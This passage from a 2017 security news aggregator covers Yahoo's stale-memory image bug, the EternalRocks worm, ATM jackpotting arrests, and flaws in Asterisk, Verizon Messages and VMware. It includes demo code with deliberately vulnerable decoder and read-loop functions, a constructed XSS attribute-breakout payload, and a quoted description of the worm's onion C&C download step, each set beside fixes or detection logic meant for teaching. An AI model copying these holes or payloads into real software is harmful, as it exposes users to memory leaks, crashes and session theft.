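#define CMD_RUN 0x01
#define CANVAS_MAX 64
/* One reusable chunk stands in for the heap: a buffer freed after a previous
 * user's decode keeps its old bytes until something overwrites them, just as
 * a recycled malloc chunk does. */
static uint8_t g_chunk[CANVAS_MAX];

/* Simulate a previous user's image having been decoded into, and freed from,
 * the chunk that the next decode is about to reuse. */
void seed_chunk(uint8_t previous_pixel) { memset(g_chunk, previous_pixel, CANVAS_MAX); }
/* "Allocate" the chunk; like malloc, it does NOT clear the contents. */
static uint8_t *chunk_alloc(size_t n) { return n <= CANVAS_MAX ? g_chunk : NULL; }

typedef struct { uint8_t width, height, flags, background; } hdr_t;

static int parse_header(const uint8_t *b, size_t len, hdr_t *h) {
    if (len < 4 || b[0] == 0 || b[1] == 0) return -1;
    h->width = b[0]; h->height = b[1]; h->flags = b[2]; h->background = b[3];
    return ((size_t)h->width * h->height <= CANVAS_MAX) ? 0 : -1;
}

/* Apply the run list. An empty list (CMD_END or nothing at all) is valid and
 * writes no pixels: that is the case that exposes the bug. */
static int apply_runs(const uint8_t *c, size_t len, uint8_t *canvas, size_t px) {
    for (size_t i = 0; i < len && c[i] != CMD_END; i += 4) {
        if (c[i] != CMD_RUN || i + 4 > len) return -1;
        size_t off = c[i + 1], run = c[i + 2];
        if (off + run > px) return -1;        /* reject out-of-bounds writes */
        memset(canvas + off, c[i + 3], run);
    }
    return 0;
}

/* VULNERABLE: initialization is left to a flag the file controls. A header
 * without FLAG_CLEAR_CANVAS plus an empty run list returns the stale chunk. */
uint8_t *decode_vulnerable(const uint8_t *img, size_t len, size_t *px_out) {
    hdr_t h;
    if (parse_header(img, len, &h)) return NULL;
    size_t px = (size_t)h.width * h.height;
    uint8_t *canvas = chunk_alloc(px);
    if (!canvas) return NULL;
    if (h.flags & FLAG_CLEAR_CANVAS) memset(canvas, h.background, px);
    if (apply_runs(img + 4, len - 4, canvas, px)) return NULL;
    *px_out = px;
    return canvas;
}

/* HARDENED: the canvas is always initialized before any run is applied, so
 * the output can only contain bytes that this decode wrote itself. */
uint8_t *decode_hardened(const uint8_t *img, size_t len, size_t *px_out) {
    hdr_t h;
    if (parse_header(img, len, &h)) return NULL;
    size_t px = (size_t)h.width * h.height;
    uint8_t *canvas = chunk_alloc(px);
    if (!canvas) return NULL;
    memset(canvas, (h.flags & FLAG_CLEAR_CANVAS) ? h.background : 0, px);
    if (apply_runs(img + 4, len - 4, canvas, px)) return NULL;
    *px_out = px;
    return canvas;
}

/* Constructed 4x4 image: no clear flag and no run commands (4 bytes). */
const uint8_t SAMPLE_NO_INIT[4] = { 4, 4, 0x00, 0x00 };
/* Constructed 4x4 image that clears to 0x11 and paints pixels 5..7 as 0x22. */
const uint8_t SAMPLE_NORMAL[9] = { 4, 4, FLAG_CLEAR_CANVAS, 0x11,
                                   CMD_RUN, 5, 3, 0x22, CMD_END };

/* Decode `img` after a previous user's pixels (0xAB) were left in the chunk,
 * and return how many output pixels still carry that stale value. */
size_t stale_pixels(const uint8_t *img, size_t len, int hardened) {
    size_t px = 0, stale = 0;
    seed_chunk(0xAB);
    uint8_t *out = hardened ? decode_hardened(img, len, &px)
                            : decode_vulnerable(img, len, &px);
    if (!out) return (size_t)-1;              /* input was rejected */
    for (size_t i = 0; i < px; i++) stale += (out[i] == 0xAB);
    return stale;
}

/* Sanity check: the hardened decoder still renders a normal image correctly. */
int normal_decode_ok(void) {
    size_t px = 0;
    uint8_t *out = decode_hardened(SAMPLE_NORMAL, sizeof SAMPLE_NORMAL, &px);
    return out && px == 16 && out[0] == 0x11 && out[5] == 0x22 && out[8] == 0x11;
}

int main(void) {
    printf("vulnerable: %zu stale pixels, hardened: %zu stale pixels (of 16)\n",
           stale_pixels(SAMPLE_NO_INIT, 4, 0), stale_pixels(SAMPLE_NO_INIT, 4, 1));
    return 0;
}
```

The same defensive rule applies to any decoder: treat "skip initialization" hints in attacker-controlled input as advisory at best, and never hand a buffer to the output stage unless every byte of it was written by this decode.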

In his own POC he attached an 18-byte exploit file as a Yahoo! Mail attachment, sent it to himself and clicked on the image in the received mail to launch the image preview pane. "The resulting JPEG image served to my browser," he writes, "is based on uninitialized, or previously freed, memory content."

He reported the problem to Yahoo, and was pleased with Yahoo's response. It was fixed well within Yahoo's self-imposed 90-day deadline, and, he says, the communication was excellent. Compare this to his comments on communication with Box: "communications were painful, as if they were filtered through a gaggle of PR representatives and an encumbrance of lawyers."

The fix itself was simple and complete: Yahoo retired ImageMagick.

Despite its problems over the last few years, Yahoo has come a long way with improving its vulnerability response approach. In 2013, High-Tech Bridge (HTB) found numerous XSS flaws in Yahoo servers. "Each of the discovered vulnerabilities," it said at the time, "allowed any @yahoo.com email account to be compromised simply by sending a specially crafted link to a logged-in Yahoo user and making him/her click on it."

The HTB researcher was offered a $12-50 Yahoo store voucher for each of the flaws. This time, however, Evans was offered a total of $14,000 for this and a separate issue yet to be documented. When Evans suggested donating it to charity, Yahoo doubled the charitable award to $28,000.

SecurityWeek has asked Yahoo for a comment on the issue, but has not yet received a reply.


Expert finds EternalRocks, a malware that uses 7 NSA Hacking Tools
23.5.2017 securityaffairs BigBrothers

A security expert discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw to spread itself like WannaCry ransomware.
The security expert Miroslav Stampar, a member of the Croatian Government CERT, has discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw in the SMB protocol to spread itself like the popular WannaCry ransomware.

Stampar discovered EternalRocks after it infected his SMB honeypot; he called the malware ‘DoomsDayWorm.’

Miroslav Stampar @stamparm
If I will be asked to choose a name, let it be a DoomsDayWorm :D c52f20a854efb013a0a1248fd84aaa95
3:44 AM - 18 May 2017
Stampar discovered that EternalRocks disguises itself as WannaCry, but instead of delivering ransomware, it takes over the affected computer to power other attacks.

The researcher decompiled an older sample (start of May) of EternalRocks and published it on Github.


Miroslav Stampar @stamparm
Just captured 406ac1595991ea7ca97bc908a6538131 and 5c9f450f2488140c21b6a0bd37db6a40 in MS17-010 honeypot. MSIL/.NET #WannaCry copycat(s)
5:28 PM - 17 May 2017
Miroslav Stampar @stamparm
Info on (new) EternalRocks worm can be found on https://github.com/stamparm/EternalRocks/ …. Will keep it updated, along with @_jsoo_
2:43 PM - 18 May 2017
Unlike the WannaCry ransomware, which leverages the two NSA hacking tools EternalBlue and DoublePulsar, EternalRocks uses seven exploits leaked by the Shadow Brokers, and its code doesn’t include a kill switch.

EternalRocks was developed to avoid detection and remain undetected on the target system; it uses the following NSA tools:

EternalBlue — SMBv1 exploit tool
EternalRomance — SMBv1 exploit tool
EternalChampion — SMBv2 exploit tool
EternalSynergy — SMBv3 exploit tool
SMBTouch — SMB reconnaissance tool
ArchTouch — SMB reconnaissance tool
DoublePulsar — Backdoor Trojan
EternalRocks downloads all the above SMB exploits to the infected computer, then it scans the internet for open SMB ports on other systems to compromise.


Looking closely at the list, we find the SMB exploits EternalBlue, EternalChampion, EternalSynergy and EternalRomance.

DoublePulsar is the backdoor the malware uses to implement its network worm capabilities, while SMBTouch and ArchTouch are SMB reconnaissance tools designed to scan for systems with open SMB ports exposed on the Internet.

EternalRocks works in two stages:

During the first stage, EternalRocks downloads Tor on the affected computer, then uses it to connect to the command-and-control (C&C) server located on the Tor network.

The second stage starts after 24 hours; the malware delays its action in an attempt to evade sandbox analysis.

“First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages) TaskScheduler and SharpZLib from Internet, while dropping svchost.exe (e.g. sample) and taskhost.exe (e.g. sample). Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C (ubgdgno5eswkhmpy.onion) communication requesting further instructions (e.g. installation of new components).” wrote the researcher.

“Second stage malware taskhost.exe (Note: different than one from first stage) (e.g. sample) is being downloaded after a predefined period (24h) from http://ubgdgno5eswkhmpy.onion/updates/download?id=PC and run. After initial run it drops the exploit pack shadowbrokers.zip and unpacks contained directories payloads/, configs/ and bins/. After that, starts a random scan of opened 445 (SMB) ports on Internet, while running contained exploits (inside directory bins/) and pushing the first stage malware through payloads (inside directory payloads/). Also, it expects running Tor process from first stage to get further instructions from C&C.“


Europol arrested 27 for jackpotting attacks on ATMs across Europe
23.5.2017 securityweek CyberCrime

27 people have been arrested in a Europol-supported operation for jackpotting attacks on ATMs across several European countries.
Police in several EU Member States and Norway, supported by Europol, have arrested 27 people accused of taking part in a series of successful “black box” attacks against ATMs across Europe. Since 2016 these attacks have caused losses of more than €45 million.

“The efforts of a number of EU Member States and Norway, supported by Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT), culminated in the arrest of 27 individuals linked with so-called ATM “Black Box” attacks across Europe.” states Europol. “Perpetrators responsible for this new and sophisticated method of ATM jackpotting were identified in a number of countries over different periods of time in 2016 and 2017. There were arrests in Czech Republic (3), Estonia (4), France (11), the Netherlands (2), Romania (2), Spain (2) and Norway (3).”

The first attacks were observed in 2015, but the technique was widely adopted by criminals from 2016 onwards.
“In a European ATM Crime Report covering 2016 EAST has reported that ATM black box attacks were up 287% when compared to 2015.” states the European ATM Security Team (EAST).

“A total of 58 such attacks were reported by ten countries, up from 15 attacks during 2015. ‘Black Box’ is the connection of an unauthorised device which sends dispense commands directly to the ATM cash dispenser in order to ‘cash-out’ the ATM. Related losses were down 39%, from €0.74 million to €0.45 million.”

The technique is very effective: criminals are estimated to have stolen €45 million with it since 2016.

The attack method was first demonstrated publicly by the late researcher Barnaby Jack, who coined the term jackpotting at the 2010 Black Hat conference.

A black box attack starts by drilling or cutting a hole in the ATM’s casing to reach the cables or ports of the cash dispenser; the crooks then connect a laptop or other device that sends dispense commands directly to the dispenser, bypassing the ATM’s own PC.


The arrests were part of a still ongoing Europol-supported operation conducted with law enforcement agencies of several European states. Below are the details of the arrests:

Netherlands (2 people)
Romania (2 people)
Spain (2 people)
Norway (3 people)
Czech Republic (3 people)
Estonia (4 people)
France (11 people)
“Our joint efforts to tackle this new criminal phenomenon resulted in significant arrests across Europe. However the arrest of offenders is only one part of stopping this form of criminality. Increasingly we need to work closely with the ATM industry to design out vulnerabilities at source and prevent the crime taking place,” said Steven Wilson, Head of Europol’s European Cybercrime Centre.

The crooks that were involved in the jackpotting ATM Black Box attacks are mainly from countries in Eastern Europe, such as Romania, Moldova, Russia, and Ukraine.

Brian Krebs’s post “Thieves Jackpot ATMs With ‘Black Box’ Attack” is a good description of these attacks.


Critical DoS Flaws Patched in Asterisk Framework

23.5.2017 securityweek Vulnerebility
Updates released on Friday for the Asterisk communications framework address three critical denial-of-service (DoS) vulnerabilities discovered by Sandro Gauci, a penetration tester and researcher who specializes in VoIP and communications systems.

Asterisk, considered the world’s most popular open source communications framework, is used by government agencies, carriers and other businesses, including most Fortune 1000 companies. According to its developers, more than one million IP PBX systems, VoIP gateways, conference servers and other solutions rely on Asterisk.

Gauci discovered in April that the project is affected by three potentially serious vulnerabilities that can be exploited to cause the system to crash. Separate advisories have been published by Asterisk developers for each of the flaws.

The vulnerabilities affect all versions of Asterisk 13, 14 and Certified Asterisk 13.13. The issues have been addressed with the release of versions 13.15.1, 14.4.1 and 13.13-cert4.

One of the security holes can be exploited by a remote attacker to cause Asterisk to exhaust all available memory by sending a specially crafted Signalling Connection Control Part (SCCP) packet. Removing or disabling support for the SCCP protocol prevents potential attacks.

“A remote memory exhaustion can be triggered by sending an SCCP packet to Asterisk system with ‘chan_skinny’ enabled that is larger than the length of the SCCP header but smaller than the packet length specified in the header. The loop that reads the rest of the packet doesn’t detect that the call to read() returned end-of-file before the expected number of bytes and continues infinitely. The ‘partial data’ message logging in that tight loop causes Asterisk to exhaust all available memory,” Asterisk developers wrote in their advisory.
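To make that failure mode concrete, here is an added example (my own code, not the Asterisk chan_skinny source): a minimal length-prefixed packet reader over a local socket pair, first in the shape the advisory describes and then with the missing end-of-file check. The 4-byte little-endian header, the demo-only spin cap on the vulnerable loop, and the socketpair stand-in for a network connection are all assumptions for the example.

```python
import socket
import struct

# Constructed framing for this example: a 4-byte little-endian body length
# followed by the body. It is not the real SCCP header layout; only the
# "length field promises more bytes than arrive" shape matters here.
HEADER_LEN = 4
MAX_SPINS = 1000  # demo-only cap so the vulnerable loop terminates


def read_body_vulnerable(sock, body_len):
    """Read until body_len bytes are in hand. A zero-length recv() (the peer
    closed the socket) adds nothing to the buffer, so the loop condition never
    changes and, without the cap, this spins forever. In Asterisk each spin
    also logged a 'partial data' message, which is what exhausted memory.
    Returns (data, spins); spins == MAX_SPINS means the loop would have hung."""
    buf = b""
    spins = 0
    while len(buf) < body_len:
        chunk = sock.recv(body_len - len(buf))
        buf += chunk                     # b"" on EOF: no progress
        if not chunk:
            spins += 1
            if spins >= MAX_SPINS:       # not part of the bug, demo only
                break
    return buf, spins


def read_body_fixed(sock, body_len):
    """Same loop with the missing check: a zero-length read means the peer
    closed before sending the advertised number of bytes."""
    buf = b""
    while len(buf) < body_len:
        chunk = sock.recv(body_len - len(buf))
        if not chunk:
            raise ConnectionError(
                f"peer closed after {len(buf)} of {body_len} body bytes")
        buf += chunk
    return buf


def read_packet(sock, body_reader):
    """Read the length header, then hand the advertised length to body_reader."""
    hdr = sock.recv(HEADER_LEN)
    if len(hdr) < HEADER_LEN:
        raise ConnectionError("short header")
    (body_len,) = struct.unpack("<I", hdr)
    return body_reader(sock, body_len)


def simulate(body_reader, advertised_len=64, sent_body=b"A" * 16):
    """Constructed attacker: advertise advertised_len body bytes, send
    sent_body (fewer by default), then close so recv() returns b''."""
    client, server = socket.socketpair()
    try:
        client.sendall(struct.pack("<I", advertised_len) + sent_body)
        client.close()
        return read_packet(server, body_reader)
    finally:
        server.close()
        client.close()


def fixed_rejects_truncated_packet():
    """True when the hardened reader refuses the truncated packet."""
    try:
        simulate(read_body_fixed)
    except ConnectionError:
        return True
    return False


if __name__ == "__main__":
    data, spins = simulate(read_body_vulnerable)
    print(f"vulnerable reader: got {len(data)} bytes, spun {spins} times on EOF")
    print("fixed reader rejects truncated packet:", fixed_rejects_truncated_packet())
    print("fixed reader accepts a well-formed packet:",
          simulate(read_body_fixed, advertised_len=16) == b"A" * 16)
```

The same rule applies to any blocking read loop driven by a length field the peer controls: a read that returns zero bytes is a terminal condition, not a retry, and the advertised length should additionally be bounded before any allocation or logging happens.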

The other two vulnerabilities found by Gauci affect PJSIP, an open source multimedia communication library that implements SIP (Session Initiation Protocol) and other protocols. The flaws can be exploited remotely to cause a crash by sending specially crafted SIP packets.

The latest Asterisk releases include a version of PJSIP that addresses these vulnerabilities. However, other projects using the PJSIP library are vulnerable as well, and they will need to obtain upstream patches to protect their users against attacks.


EternalRocks Network Worm Leverages 7 NSA Hacking Tools

23.5.2017 securityweek BigBrothers
EternalRocks Worm Uses NSA Exploits to Compromise Systems and Install DoublePulsar Backdoor

A recently discovered network worm leverages a total of seven hacking tools stolen from the National Security Agency (NSA)-linked Equation Group.

Dubbed EternalRocks and capable of self-replication, the threat emerged over the past couple of weeks, with the most recent known sample dated May 3. The malware was discovered by security researcher Miroslav Stampar, who also found that the tool was initially called MicroBotMassiveNet.

The seven NSA hacking tools included in the network worm include the EternalBlue, EternalChampion, EternalRomance, and EternalSynergy exploits, along with the DoublePulsar backdoor and the Architouch, and Smbtouch SMB reconnaissance tools.

The exploits were made public in April by the hacker group going by the name of Shadow Brokers and are said to have been stolen from the NSA-linked threat actor Equation Group last year. Within days after the tools were released, Microsoft said that it had already patched the vulnerabilities targeted by the exploits with its March 2017 security updates.

However, because not all vulnerable devices have been patched, these exploits continue to be effective, and the recent WannaCry ransomware outbreak is the best example of that. The WannaCry malware abused the EternalBlue exploit for distribution, and other threats did the same, including the UIWIX ransomware, Adylkuzz botnet, and a stealth Remote Access Trojan.

The EternalRocks worm is yet another malicious program attempting to cash in on the release of these exploits. Its purpose seems pretty straightforward: it compromises systems to install the DoublePulsar backdoor on them.

The worm uses a two-stage infection process to deliver its payload, but appears to be more of a research project at the moment than an actual malicious tool.

“First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages) TaskScheduler and SharpZLib from Internet, while dropping svchost.exe and taskhost.exe. Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C (command and control) communication requesting further instructions,” Stampar notes.

The second-stage payload is downloaded only after a 24-hour period has passed, and is hidden as the taskhost.exe process. The payload drops the exploit pack shadowbrokers.zip, unpacks contained directories payloads/, configs/ and bins/, and then starts a random scan of opened 445 (SMB) ports on the Internet.

EternalRocks also runs contained exploits (inside directory bins/) and pushes the first stage malware through payloads (inside directory payloads/). Moreover, the running Tor process continues to wait for further instructions from the C&C.

In an emailed comment, Michael Patterson, CEO of Plixer, told SecurityWeek that EternalRocks, currently the “first known malware incorporating all seven of the NSA hacking tools,” is clearly a more stealthy tool, given its delayed Tor communication and that administrators looking to keep their systems safe from this threat might have already lost the battle with it.

“Once a device is infected, applying a subsequent patch does not remove the malware. The most effective way for security teams to monitor for any infected devices is to leverage network traffic analytics to look for any historical Tor connections leaving the organization,” Patterson said.

“The race to detect and stop all malware was lost years ago. Organizations must constantly monitor their environments for anomalous behaviors, maintain a historical forensic database, and have a well-defined storage backup and recovery process for all critical data,” he concluded.
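The two-stage behaviour described by Stampar above (and in the earlier write-up of the same worm on this page) and Patterson's advice to look for historical Tor connections suggest a simple correlation: a host that fetched Tor from archive.torproject.org and, roughly a day later, began fanning out to many Internet addresses on port 445. The following is an added example, not code from the page or from Stampar's repository; the flow-record format, the addresses (TEST-NET ranges stand in for Internet hosts), the 10-minute window and the 10-target threshold are all assumptions.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed flow records, one per line: timestamp src dst dport sni_or_host.
# Every address and the format itself are assumptions for this example.
SAMPLE_LOG = "\n".join([
    "2017-05-17T02:05:11Z 10.0.0.7 203.0.113.10 443 archive.torproject.org",
    "2017-05-17T02:05:40Z 10.0.0.7 203.0.113.25 443 -",
    "2017-05-17T02:06:02Z 10.0.0.12 203.0.113.10 443 archive.torproject.org",
    "2017-05-17T09:14:00Z 10.0.0.9 10.0.0.2 445 -",   # ordinary internal SMB
    "2017-05-18T09:14:00Z 10.0.0.9 10.0.0.2 445 -",
] + [  # second stage, ~24h later: 10.0.0.7 fans out on 445 to Internet hosts
    f"2017-05-18T02:07:{15 + i:02d}Z 10.0.0.7 198.51.100.{i + 1} 445 -"
    for i in range(12)
])

TOR_HOST_SUFFIX = "torproject.org"
SCAN_WINDOW = timedelta(minutes=10)
SCAN_THRESHOLD = 10   # distinct external targets on 445 within the window
# What counts as "internal" is an assumption: RFC 1918 space only.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def parse_log(text):
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, host = line.split()
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "src": src, "dst": dst, "dport": int(dport), "host": host})
    return sorted(events, key=lambda e: e["ts"])


def first_tor_download(events):
    """First-stage indicator: per source, earliest contact with torproject.org
    (the svchost.exe component fetching Tor)."""
    seen = {}
    for e in events:
        if e["host"].endswith(TOR_HOST_SUFFIX) and e["src"] not in seen:
            seen[e["src"]] = e["ts"]
    return seen


def smb_scan_bursts(events):
    """Second-stage indicator: per source, start of the first SCAN_WINDOW in
    which it touched SCAN_THRESHOLD distinct external addresses on 445."""
    per_src = defaultdict(list)
    for e in events:
        if e["dport"] == 445 and is_external(e["dst"]):
            per_src[e["src"]].append(e)
    bursts = {}
    for src, evs in per_src.items():
        for i, start in enumerate(evs):
            targets = {x["dst"] for x in evs[i:]
                       if x["ts"] - start["ts"] <= SCAN_WINDOW}
            if len(targets) >= SCAN_THRESHOLD:
                bursts[src] = start["ts"]
                break
    return bursts


def analyze_flows(text):
    """Correlate both stages per host. delay_hours is the gap between the Tor
    fetch and the scan burst; because the worm waits about 24h, a query that
    only looks back a few hours will never see the two together."""
    events = parse_log(text)
    tor, scans = first_tor_download(events), smb_scan_bursts(events)
    report = {}
    for src in set(tor) | set(scans):
        delay = None
        if src in tor and src in scans and scans[src] > tor[src]:
            delay = (scans[src] - tor[src]).total_seconds() / 3600
        report[src] = {"tor_download": tor.get(src),
                       "smb_scan_start": scans.get(src),
                       "delay_hours": delay}
    return report


if __name__ == "__main__":
    for src, r in sorted(analyze_flows(SAMPLE_LOG).items()):
        print(src, r)
```

On the constructed data, 10.0.0.7 shows both stages about 24 hours apart, 10.0.0.12 shows only the Tor download (first stage, still inside its wait), and 10.0.0.9, whose port-445 traffic is internal file sharing, is not reported. Each indicator alone is noisy; the pairing, with the day-long gap, is what distinguishes this worm from a legitimate Tor user or an internal SMB scanner.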


Verizon Messages App Allowed XSS Attacks Over SMS

23.5.2017 securityweek Mobil
Until a few months ago, Verizon’s Messages service was affected by a vulnerability that could have easily been exploited to launch cross-site scripting (XSS) attacks using SMS messages.

Verizon Messages (Message+) is a text and multimedia messaging service that allows users to send and receive messages across multiple types of devices, including mobile and desktop, without interruption.

Researcher Randy Westergren analyzed the application’s SMS feature and after sending some URLs to a test account to see how each type of link is rendered, he noticed that adding single quotation marks to a URL allowed him to break out of the HREF attribute and execute arbitrary JavaScript code.

According to the expert, an attacker simply had to send a specially crafted SMS to the targeted user to take complete control of the victim’s session. Once the user clicked on the malicious message, the attacker could use any functionality of the application, including sending SMS messages on the victim’s behalf or intercepting their messages.

The researcher sent his proof-of-concept (PoC) code along with a video and screenshots to Verizon in mid-November 2016. The flaw was resolved by the telecoms giant within a few weeks, but its details were disclosed only on Sunday.

The vendor addressed the vulnerability using the DOM API, which is the fix suggested by Westergren.
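The breakout itself is easy to reproduce. The following is an added example, not Verizon's code or Westergren's proof of concept: a toy link renderer in the vulnerable shape (the URL dropped into a single-quoted href) next to a hardened one, with a parser showing which attributes a browser would actually see. The page says Verizon fixed the issue by building the element through the DOM API in the browser; this server-side example instead uses scheme validation plus entity encoding, which is the equivalent fix when the markup is produced as a string. The payload and hostnames are constructed.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit


def render_link_vulnerable(url):
    """Constructed stand-in for the vulnerable message view: the value is
    dropped straight into a single-quoted attribute."""
    return f"<a href='{url}'>{url}</a>"


def render_link_hardened(url):
    """Only http(s) URLs become links, and the value is entity-encoded
    (quote=True also encodes ' and "), so it can never close the attribute."""
    scheme = urlsplit(url).scheme.lower()
    safe = html.escape(url, quote=True)
    if scheme not in ("http", "https"):
        return safe                      # rendered as text, not as a link
    return f"<a href='{safe}'>{safe}</a>"


class _AnchorAttrs(HTMLParser):
    """Collect the attributes a browser would see on the first <a> tag."""
    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "a" and self.attrs is None:
            self.attrs = dict(attrs)


def anchor_attributes(markup):
    parser = _AnchorAttrs()
    parser.feed(markup)
    return parser.attrs or {}


# Constructed payload: the quote ends href and the remainder is parsed as a
# second attribute, an event handler in this case.
PAYLOAD = "http://example.test/' onmouseover='alert(document.cookie)"

if __name__ == "__main__":
    print("vulnerable:", anchor_attributes(render_link_vulnerable(PAYLOAD)))
    print("hardened:  ", anchor_attributes(render_link_hardened(PAYLOAD)))
    print("javascript: URL hardened:",
          anchor_attributes(render_link_hardened("javascript:alert(1)")))
```

With the vulnerable renderer the parsed anchor carries an `onmouseover` attribute; with the hardened one it carries only `href`, whose value is the literal payload, and a `javascript:` URL is shown as plain text. Escaping alone is not enough for an href, which is why the scheme check is there.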

This was not the first time the researcher had found a potentially serious flaw in a Verizon service. In January 2015, Westergren disclosed a vulnerability in Verizon’s FiOS web service that could have been exploited to hijack email accounts.

Last year, the expert discovered a critical security hole in Verizon’s webmail service that could have been leveraged by hackers to silently forward a user’s emails to an arbitrary address.


Windows 7 Most Hit by WannaCry Ransomware

23.5.2017 securityweek Ransomware
Most of the computers affected by the WannaCry ransomware outbreak were running Windows 7, security researchers have revealed.

Initially, the malware was believed to have hit mostly computers running Windows XP, mainly because of its attack vector – exploiting a Server Message Block (SMB) version 1 vulnerability. According to a tweet from Kaspersky Lab’s director of Global Research and Analysis Team Costin Raiu, however, the number of Windows XP infections was insignificant.

Windows 7 x64 machines were hit the most, accounting for 60.35% of infections, with Windows 7 x86 coming in second, at 31.72%, the researcher also revealed. These two Windows 7 versions, along with Windows 7 Home x64 and x86 editions, accounted for around 98% of all WannaCry infections, it seems.

[Linked chart: Over 98% of All WannaCry Victims Were Using Windows 7]
Costin Raiu (@craiu), 3:40 PM - 19 May 2017: "#WannaCry infection distribution by the Windows version. Worst hit - Windows 7 x64. The Windows XP count is insignificant."

WannaCry made a name for itself after researchers discovered it had a worm component abusing the NSA-linked EternalBlue and DoublePulsar exploits to automatically spread to other vulnerable machines. The exploit was said to target all Windows versions from XP to 8.1 (Windows Server 2003 & 2008 as well), but the worm is now said to be reliable only when hitting Windows 7.

Actual infection numbers aren’t out yet, but researchers estimate that around 420,000 machines have been hit by the ransomware to date. Because a researcher registered a kill-switch domain soon after the outbreak started (upon infection, the malware would beacon to a hardcoded domain and terminate its process when receiving a response), only some of these machines ended up infected with WannaCry.

Microsoft resolved the targeted SMB vulnerability in March and also released an emergency patch for unsupported platform versions on May 13, only one day after the ransomware outbreak started. In the aftermath of WannaCry, however, researchers discovered that both a crypto-currency mining botnet and a backdoor had been abusing the exploit for weeks. The exploit is also used by a ransomware family called UIWIX.

WannaCry hasn’t infected only PCs, but other types of machines as well, including medical devices. In fact, Britain’s National Health Service (NHS) was among the first organizations to have been hit by the malware.

Soon after the initial wave of infections, security researchers started observing new WannaCry variations, including some that didn’t use a kill-switch domain. What’s more, Cyphort researchers reported last week that a new ransomware variant was using a kill-switch domain that couldn’t be registered.

The variant uses a domain in the .test Top Level Domain, which cannot be registered, as it is reserved by the IETF (Internet Engineering Task Force) for testing purposes only, Cyphort says. Because the sample has been submitted to VirusTotal from 4 different countries (Germany, Australia, Denmark and South Korea), it’s unlikely that it is a test.

“It seems that the cyber criminals found a smarter way to evade sandbox detection by checking on a site that researchers cannot sinkhole. This technique allows the malware to spread again unchallenged. It is crucial that people patch Windows machines as soon as possible to close the SMB vulnerability and stop the spread of this ransomware. In the meantime, make sure you have a good backup of your important files,” Cyphort says.

In the meantime, security researchers are working on tools that can help WannaCry victims recover their files without paying the ransom. One of them is Wannakey, designed to extract key material from infected Windows XP PCs. However, it requires a second tool to decrypt files.

Building on Wannakey and already tested by Europol, a tool called wanakiwi appears more suited for the file decryption/restoration operation. One thing that both tools require, however, is that the WannaCry-infected computers haven’t been rebooted after the encryption took place. Already confirmed to work on Windows XP, 7, and Server 2003 (x86), wanakiwi might also work on Vista and Server 2008 and 2008 R2.


VMware Patches Workstation Vulnerabilities

23.5.2017 securityweek Vulnerebility
VMware informed customers last week that updates released for the Linux and Windows versions of Workstation patch privilege escalation and denial-of-service (DoS) vulnerabilities.

One of the flaws, discovered by Jann Horn of Google Project Zero and tracked as CVE-2017-4915, affects VMware Workstation Pro and Player 12.x on Linux. The weakness has been classified as “important” severity.

The security hole, described as an insecure library loading vulnerability, allows an unprivileged host user to escalate their privileges to root on the host via ALSA sound driver configuration files.

The second vulnerability, identified by Borja Merino and tracked as CVE-2017-4916, affects VMware Workstation Pro and Player 12.x on Windows.

This “moderate” severity flaw is a NULL pointer dereference issue that exists in the vstor2 driver. An attacker with regular host user privileges can exploit the vulnerability to cause a DoS condition on the host machine.

The vulnerabilities have been patched with the release of VMware Workstation 12.5.6. There are no workarounds for either of the flaws.

VMware has released eight other security advisories this year, including for an Apache Struts 2 vulnerability that had been exploited in the wild, and security bugs disclosed by white hat hackers at this year’s Pwn2Own competition.

Exploits involving VMware virtual machine escapes earned participants more than $200,000 at Pwn2Own 2017. Researchers at Qihoo 360 received $105,000 for an Edge exploit that achieved a VM escape, while Tencent Security’s Team Sniper earned $100,000 for a Workstation exploit.


WikiLeaks Details Malware Made by CIA and U.S. Security Firm

22.5.2017 securityweek BigBrothers
WikiLeaks has published documents detailing another spy tool allegedly used by the U.S. Central Intelligence Agency (CIA). The latest files describe “Athena,” a piece of malware whose developers claim it works on all versions of Windows.

Documents apparently created between September 2015 and February 2016 describe Athena as an implant that can be used as a beacon and for loading various payloads into memory. The tool also allows its operator to plant and fetch files to or from a specified location on the compromised system.

A leaked diagram shows that Athena can be loaded onto the targeted computer by an asset, a remote operator, or via the supply chain. The implant is said to work on all versions of Windows from XP through 10, including Windows Server 2008 and 2012, on both x86 and x64 architectures.

While WikiLeaks has not made available the actual Athena tool, experts pointed out that the leaked documents include information on file and registry changes made by the implant, which can be useful for determining if a system has been compromised.

The documents also show that Athena was developed in collaboration with Siege Technologies, a U.S.-based company that provides offensive-driven cybersecurity solutions. The firm was acquired last year by Nehemiah Security.

WikiLeaks pointed to an email stolen from Italian spyware maker Hacking Team in which Siege Technologies founder Jason Syversen says he’s “more comfortable working on electronic warfare.”

Since March 8, when it first announced the Vault 7 files focusing on the CIA’s hacking capabilities, WikiLeaks has regularly published documents describing various implants allegedly used by the agency. The latest leaks have focused on Windows hacking tools, including for man-in-the-middle (MitM) attacks on the LAN, for hampering malware attribution and analysis, and creating custom malware installers.

Many of the tech companies whose tools are targeted by the Vault 7 exploits claimed their latest products are not affected. Only Cisco admitted finding a critical vulnerability that had exposed many of the company’s switches.

The Vault 7 files and the exploits leaked by the hacker group called Shadow Brokers, including ones used in the recent WannaCry ransomware attacks, have once again brought exploit stockpiling by governments into the spotlight.

